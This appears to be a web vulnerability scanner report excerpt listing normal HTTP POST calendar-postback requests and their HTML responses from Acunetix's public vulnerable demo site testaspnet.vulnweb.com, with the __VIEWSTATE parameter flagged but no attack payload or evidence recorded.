Request Body - size: 1,133 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8232&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgBAaiC%2BZtoIZGRktJz5jAG9BS51WBumLYSbeITRWMA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLn3q%2FrBQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ9EW%2B9pHcR%2BCJdDBkRhoF0%2FjiVNGQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:35:30 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgBAaiC+ZtoIZGRktJz5jAG9BS51WBumLYSbeITRWMA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLn3q/rBQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q9EW+9pHcR+CJdDBkRhoF0/jiVNGQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:White" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1133 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,133 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8220&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgBAdSNQXdoIZGRk%2Fgxl7y9Q0cpU%2B6pPpoRroXPor04%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLe4%2Fq6BAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8thGjgjgU4D7kd7U%2BZrPLMC%2BBgWg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:00:36 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgBAdSNQXdoIZGRk/gxl7y9Q0cpU+6pPpoRroXPor04=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLe4/q6BAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8thGjgjgU4D7kd7U+ZrPLMC+BgWg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:White" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1127 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
